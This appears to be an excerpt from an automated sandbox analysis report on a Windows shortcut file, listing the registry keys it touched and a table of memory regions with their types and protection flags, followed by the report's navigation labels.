HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS

PerfMMFileName

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 242 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

26E1AE28000

heap

page read and write

26E1AE8D000

heap

page read and write

26E1AF45000

heap

page read and write

20A29EB1000

trusted library allocation

page read and write

23E33DA2000

trusted library allocation

page read and write

20A282B0000

heap

page read and write

26E1AE55000

heap

page read and write

23E33DE2000

trusted library allocation

page read and write

20A42273000

heap

page read and write

20A2B879000

trusted library allocation

page read and write

23B6BFD0000

trusted library section

page read and write

23B718B9000

heap

page read and write

23E30720000

heap

page read and write

23E4AB46000

heap

page read and write

20A42250000

heap

page execute and read and write

7FFD34220000

trusted library allocation

page read and write

7FFD34550000

trusted library allocation

page read and write

20A424D0000

heap

page execute and read and write

20A422B0000

heap

page read and write

64CF937000

stack

page read and write

7FFD3468B000

trusted library allocation

page read and write

E394AFA000

stack

page read and write

23B7190E000

heap

page read and write

7FFD34214000

trusted library allocation

page read and write

64D078D000

stack

page read and write

20A2A13F000

trusted library allocation

page read and write

20A29EA0000

heap

page read and write

E3953FE000

stack

page read and write

7FFD34460000

trusted library allocation

page read and write

20A29C40000

trusted library allocation

page read and write

20A42327000

heap

page read and write

7FFD34213000

trusted library allocation

page execute and read and write

20A2B222000

trusted library allocation

page read and write

7FFD344F0000

trusted library allocation

page read and write

23E30A60000

heap

page read and write

23B6C7E1000

trusted library allocation

page read and write

7FFD34980000

trusted library allocation

page read and write

D648DFE000

unkown

page readonly

23E32A89000

trusted library allocation

page read and write

23B7184D000

heap

page read and write

23B6C074000

heap

page read and write

7FFD3472C000

trusted library allocation

page execute and read and write

7FFD343E0000

trusted library allocation

page execute and read and write

20A282F5000

heap

page read and write

D6475F7000

stack

page read and write

20A4252E000

heap

page read and write

64CF8BE000

stack

page read and write

26E1AD20000

heap

page read and write

7FFD34940000

trusted library allocation

page read and write

44BA4FD000

stack

page read and write

23E4A8FE000

heap

page read and write

B5667E000

unkown

page read and write

44BA37B000

stack

page read and write

23B6C0BA000

heap

page read and write

7FFD34720000

trusted library allocation

page read and write

20A29CD5000

heap

page read and write

64CF57E000

stack

page read and write

23B7184F000

heap

page read and write

7FFD348F0000

trusted library allocation

page read and write

20A42291000

heap

page read and write

23E4AAA0000

heap

page execute and read and write

23B6D110000

trusted library section

page readonly

20A2B8AE000

trusted library allocation

page read and write

D6487FB000

stack

page read and write

20A2833C000

heap

page read and write

D64957E000

stack

page read and write

7FFD34230000

trusted library allocation

page read and write

23E32A8D000

trusted library allocation

page read and write

64CFB3F000

stack

page read and write

7FFD34540000

trusted library allocation

page read and write

23B71530000

trusted library allocation

page read and write

1898FBD0000

heap

page read and write

7FFD34900000

trusted library allocation

page read and write

23E33DFC000

trusted library allocation

page read and write

18990030000

heap

page read and write

7FFD34730000

trusted library allocation

page execute and read and write

7DF454970000

trusted library allocation

page execute and read and write

23B6D150000

trusted library section

page readonly

20A423F3000

heap

page read and write

23B71540000

trusted library allocation

page read and write

23E30740000

heap

page read and write

23B6C0FE000

heap

page read and write

44BA9BB000

stack

page read and write

23B716E0000

remote allocation

page read and write

7FFD3467D000

trusted library allocation

page execute and read and write

64CF879000

stack

page read and write

7FFD34680000

trusted library allocation

page read and write

D6477FE000

stack

page read and write

D64807E000

stack

page read and write

7DF44DD20000

trusted library allocation

page execute and read and write

B563B9000

stack

page read and write

23E4AB20000

heap

page read and write

20A42300000

heap

page read and write

7FFD3421D000

trusted library allocation

page execute and read and write

23E34197000

trusted library allocation

page read and write

64CF6FF000

stack

page read and write

23E307B3000

heap

page read and write

20A2AB3F000

trusted library allocation

page read and write

44BA27D000

stack

page read and write

23B71904000

heap

page read and write

D64727B000

stack

page read and write

20A2B4F2000

trusted library allocation

page read and write

20A28338000

heap

page read and write

7FFD34920000

trusted library allocation

page read and write

23B718F5000

heap

page read and write

23B71902000

heap

page read and write

26E1C850000

heap

page read and write

44BB38F000

stack

page read and write

23B71889000

heap

page read and write

23E4A985000

heap

page read and write

23B71520000

trusted library allocation

page read and write

23B6C08C000

heap

page read and write

23E30726000

heap

page read and write

44BA7BE000

stack

page read and write

7FFD348A0000

trusted library allocation

page read and write

23B71541000

trusted library allocation

page read and write

20A28295000

heap

page read and write

D64847E000

stack

page read and write

D6484FE000

unkown

page readonly

7FFD34490000

trusted library allocation

page read and write

23E33E24000

trusted library allocation

page read and write

E394FFE000

stack

page read and write

1898FD9E000

heap

page read and write

23E307DC000

heap

page read and write

23E339E5000

trusted library allocation

page read and write

D647EFE000

unkown

page readonly

D6478FE000

unkown

page readonly

7FFD34673000

trusted library allocation

page execute and read and write

20A42260000

heap

page read and write

20A29C60000

trusted library allocation

page read and write

20A29F22000

trusted library allocation

page read and write

64CF7FE000

stack

page read and write

23B71580000

trusted library allocation

page read and write

D6495FE000

unkown

page readonly

23E326F0000

heap

page read and write

D6489FE000

unkown

page readonly

20A39EC1000

trusted library allocation

page read and write

44BA578000

stack

page read and write

7FFD342CC000

trusted library allocation

page execute and read and write

7FFD342C0000

trusted library allocation

page read and write

44BA637000

stack

page read and write

7FFD348C0000

trusted library allocation

page read and write

7FFD34960000

trusted library allocation

page read and write

23E307E0000

heap

page read and write

23E32795000

trusted library allocation

page read and write

E394BFE000

stack

page read and write

23B6BFC0000

trusted library allocation

page read and write

23B6C000000

heap

page read and write

7FFD34860000

trusted library allocation

page execute and read and write

23B71862000

heap

page read and write

23B6BF60000

heap

page read and write

7FFD34510000

trusted library allocation

page read and write

23B716E0000

remote allocation

page read and write

20A42257000

heap

page execute and read and write

7FFD348B0000

trusted library allocation

page read and write

23E307FC000

heap

page read and write

20A29D10000

trusted library allocation

page read and write

20A2BB09000

trusted library allocation

page read and write

20A2830F000

heap

page read and write

23E32640000

heap

page execute and read and write

E394EFF000

stack

page read and write

E3955FB000

stack

page read and write

D64817E000

stack

page read and write

23B71680000

trusted library allocation

page read and write

23B71570000

trusted library allocation

page read and write

26E1AE20000

heap

page read and write

7FFD34870000

trusted library allocation

page read and write

23E3293D000

trusted library allocation

page read and write

7FFD34580000

trusted library allocation

page read and write

23E3416C000

trusted library allocation

page read and write

23E307BC000

heap

page read and write

23B718C0000

heap

page read and write

7FFD34840000

trusted library allocation

page execute and read and write

D648CFE000

stack

page read and write

23E34475000

trusted library allocation

page read and write

23B6C913000

heap

page read and write

20A2B4EA000

trusted library allocation

page read and write

7FFD34810000

trusted library allocation

page read and write

D6485FE000

unkown

page readonly

20A423D0000

heap

page read and write

7FFD34520000

trusted library allocation

page read and write

20A28240000

heap

page read and write

23E30829000

heap

page read and write

D6488FE000

unkown

page readonly

23B6BF80000

heap

page read and write

44B9ED6000

stack

page read and write

23B718F0000

heap

page read and write

23E4ABBF000

heap

page read and write

20A29CD0000

heap

page read and write

23E4277D000

trusted library allocation

page read and write

64CF67D000

stack

page read and write

44B9F5E000

stack

page read and write

18990034000

heap

page read and write

23E428B4000

trusted library allocation

page read and write

23B6C91A000

heap

page read and write

20A39EB1000

trusted library allocation

page read and write

23B6D4B0000

trusted library allocation

page read and write

23B6D020000

trusted library allocation

page read and write

D64897E000

stack

page read and write

D647F7E000

stack

page read and write

23E4A817000

heap

page read and write

20A42288000

heap

page read and write

7FFD34970000

trusted library allocation

page read and write

7FFD348D0000

trusted library allocation

page read and write

23E4AB3C000

heap

page read and write

23B718F7000

heap

page read and write

7FFD34880000

trusted library allocation

page read and write

7FFD34672000

trusted library allocation

page read and write

23B71584000

trusted library allocation

page read and write

D647FFE000

unkown

page readonly

23E32683000

trusted library allocation

page read and write

20A282FB000

heap

page read and write

23B71690000

trusted library allocation

page read and write

7FFD3422B000

trusted library allocation

page read and write

7FFD344A0000

trusted library allocation

page read and write

23E3076F000

heap

page read and write

7FFD34410000

trusted library allocation

page read and write

23B7190A000

heap

page read and write

1898FD99000

heap

page read and write

7FFD342F6000

trusted library allocation

page execute and read and write

23E325B0000

trusted library allocation

page read and write

20A29D13000

trusted library allocation

page read and write

20A39F23000

trusted library allocation

page read and write

23B6D100000

trusted library section

page readonly

7FFD34830000

trusted library allocation

page execute and read and write

7FFD342D0000

trusted library allocation

page execute and read and write

23B6C05B000

heap

page read and write

23B7185D000

heap

page read and write

23E4A960000

heap

page read and write

7FFD34450000

trusted library allocation

page read and write

23B6CB01000

trusted library allocation

page read and write

23E42771000

trusted library allocation

page read and write

7FFD34890000

trusted library allocation

page read and write

23B6C013000

heap

page read and write

D648EFB000

stack

page read and write

D64867E000

stack

page read and write

64D060E000

stack

page read and write

64CFBBF000

stack

page read and write

23E33E11000

trusted library allocation

page read and write

20A422CD000

heap

page read and write

23B6C09C000

heap

page read and write

7FFD34990000

trusted library allocation

page read and write

23B6CE40000

trusted library allocation

page read and write

64CF77E000

stack

page read and write

23B6C113000

heap

page read and write

23B71670000

trusted library allocation

page read and write

44BA6BA000

stack

page read and write

26E1AF20000

heap

page read and write

7FFD34790000

trusted library allocation

page execute and read and write

23B7188B000

heap

page read and write

23B6C802000

heap

page read and write

23E342E2000

trusted library allocation

page read and write

23B6C900000

heap

page read and write

D6479F9000

stack

page read and write

7FFD34480000

trusted library allocation

page read and write

20A2A0DD000

trusted library allocation

page read and write

26E1AF40000

heap

page read and write

7FFD34930000

trusted library allocation

page read and write

44BA83E000

stack

page read and write

20A29C80000

trusted library allocation

page read and write

23B71610000

trusted library allocation

page read and write

7FFD3482A000

trusted library allocation

page read and write

20A2BA40000

trusted library allocation

page read and write

20A2B510000

trusted library allocation

page read and write

23E306B0000

heap

page read and write

23B6D140000

trusted library section

page readonly

23B6C08A000

heap

page read and write

44BA5BE000

stack

page read and write

20A422DD000

heap

page read and write

23B6C91B000

heap

page read and write

23B71620000

trusted library allocation

page read and write

23E4A866000

heap

page read and write

64CF5FF000

stack

page read and write

23E307AE000

heap

page read and write

20A423F0000

heap

page read and write

20A424F0000

heap

page read and write

E3954FF000

stack

page read and write

23E307B6000

heap

page read and write

23B716E0000

remote allocation

page read and write

D647CFE000

unkown

page readonly

E394CFE000

stack

page read and write

7FFD34570000

trusted library allocation

page read and write

7FFD34674000

trusted library allocation

page read and write

23B71540000

trusted library allocation

page read and write

7FFD349A0000

trusted library allocation

page read and write

23B7159E000

trusted library allocation

page read and write

23E306D0000

heap

page read and write

D64857E000

stack

page read and write

23B6C95B000

heap

page read and write

20A29C20000

heap

page read and write

23B6C02B000

heap

page read and write

7FFD343CA000

trusted library allocation

page read and write

20A3A066000

trusted library allocation

page read and write

26E1AE00000

heap

page read and write

64CF9BE000

stack

page read and write

7FFD34821000

trusted library allocation

page read and write

7FFD34430000

trusted library allocation

page read and write

7FFD343D0000

trusted library allocation

page execute and read and write

7FFD344C0000

trusted library allocation

page read and write

23B71690000

trusted library allocation

page read and write

44BA3FE000

stack

page read and write

23E42701000

trusted library allocation

page read and write

23B6C079000

heap

page read and write

E3952FE000

stack

page read and write

23B71900000

heap

page read and write

7FFD344D0000

trusted library allocation

page read and write

B566FE000

stack

page read and write

23B6BF90000

heap

page read and write

23B72000000

heap

page read and write

64D070E000

stack

page read and write

D6481FE000

unkown

page readonly

23E341F2000

trusted library allocation

page read and write

23B714C0000

trusted library allocation

page read and write

23E32600000

trusted library allocation

page read and write

20A28290000

heap

page read and write

23B6D130000

trusted library section

page readonly

23E4AA60000

heap

page execute and read and write

23E307E8000

heap

page read and write

23E4A702000

heap

page read and write

7FFD348E0000

trusted library allocation

page read and write

23E3348D000

trusted library allocation

page read and write

20A28220000

heap

page read and write

23E30A65000

heap

page read and write

64CFC3B000

stack

page read and write

23E4A8A2000

heap

page read and write

1898FD90000

heap

page read and write

23B6C815000

heap

page read and write

23B6D120000

trusted library section

page readonly

23E4A860000

heap

page read and write

D6486FE000

unkown

page readonly

23B6C06F000

heap

page read and write

7FFD34440000

trusted library allocation

page read and write

20A2B7BF000

trusted library allocation

page read and write

44BA57E000

stack

page read and write

23B6C902000

heap

page read and write

23B718E6000

heap

page read and write

23B7182C000

heap

page read and write

7FFD34420000

trusted library allocation

page read and write

23E4A810000

heap

page read and write

23E4A964000

heap

page read and write

23B714B0000

trusted library allocation

page read and write

23B7180F000

heap

page read and write

7FFD34756000

trusted library allocation

page execute and read and write

7FFD343B0000

trusted library allocation

page read and write

23B6C091000

heap

page read and write

D6483FE000

unkown

page readonly

7FFD34852000

trusted library allocation

page read and write

20A422CF000

heap

page read and write

20A427E0000

heap

page read and write

44BA93E000

stack

page read and write

23E32701000

trusted library allocation

page read and write

20A28336000

heap

page read and write

E3951FE000

stack

page read and write

20A29C70000

heap

page readonly

64CF473000

stack

page read and write

20A282C2000

heap

page read and write

23E4AAA7000

heap

page execute and read and write

23E306A0000

heap

page read and write

20A4227F000

heap

page read and write

7FFD34530000

trusted library allocation

page read and write

23B71859000

heap

page read and write

7FFD34950000

trusted library allocation

page read and write

7FFD342C6000

trusted library allocation

page read and write

23E30824000

heap

page read and write

D647BFC000

stack

page read and write

D648BFE000

unkown

page readonly

7FFD34560000

trusted library allocation

page read and write

7FFD34212000

trusted library allocation

page read and write

7FFD34910000

trusted library allocation

page read and write

7FFD344E0000

trusted library allocation

page read and write

23B6C102000

heap

page read and write

44BA2FE000

stack

page read and write

20A29C90000

heap

page execute and read and write

D6482FC000

stack

page read and write

D648FFE000

unkown

page readonly

23B716A0000

trusted library allocation

page read and write

20A42351000

heap

page read and write

44BA47E000

stack

page read and write

7FFD34500000

trusted library allocation

page read and write

23B71560000

trusted library allocation

page read and write

D6480FE000

unkown

page readonly

23E42710000

trusted library allocation

page read and write

23E307C2000

heap

page read and write

20A29D5A000

heap

page read and write

7FFD343F2000

trusted library allocation

page read and write

23E325F0000

heap

page readonly

64CF4FD000

stack

page read and write

20A2B881000

trusted library allocation

page read and write

D647DFB000

stack

page read and write

23E307E4000

heap

page read and write

20A282FD000

heap

page read and write

7FFD34330000

trusted library allocation

page execute and read and write

23E30960000

heap

page read and write

20A42538000

heap

page read and write

23B71610000

trusted library allocation

page read and write

20A2BB05000

trusted library allocation

page read and write

44B9FDE000

stack

page read and write

7FFD34470000

trusted library allocation

page read and write

7FFD343C1000

trusted library allocation

page read and write

20A28210000

heap

page read and write

23B71800000

heap

page read and write

23B718FB000

heap

page read and write

7FFD34726000

trusted library allocation

page read and write

1898FCD0000

heap

page read and write

7FFD34400000

trusted library allocation

page execute and read and write

23B6C129000

heap

page read and write

23E30730000

heap

page read and write

1898FCB0000

heap

page read and write

D6476FE000

unkown

page readonly

7FFD3426C000

trusted library allocation

page execute and read and write

64CFA3C000

stack

page read and write

23B71570000

trusted library allocation

page read and write

23E30900000

heap

page read and write

23E325E0000

trusted library allocation

page read and write

23E32680000

trusted library allocation

page read and write

23B71842000

heap

page read and write

7FFD344B0000

trusted library allocation

page read and write

20A282EE000

heap

page read and write

23B6C800000

heap

page read and write

23B6C077000

heap

page read and write

23B7181F000

heap

page read and write

44BA739000

stack

page read and write

20A29F2D000

trusted library allocation

page read and write

20A42545000

heap

page read and write

D648AFB000

stack

page read and write

23B6C041000

heap

page read and write

D647AFE000

unkown

page readonly

There are 417 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
XA5hQdlKVd.lnk

Files

Processes

URLs

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportXA5hQdlKVd.lnk

Files

Processes

URLs

IPs

Registry

Memdumps

IOC Report
XA5hQdlKVd.lnk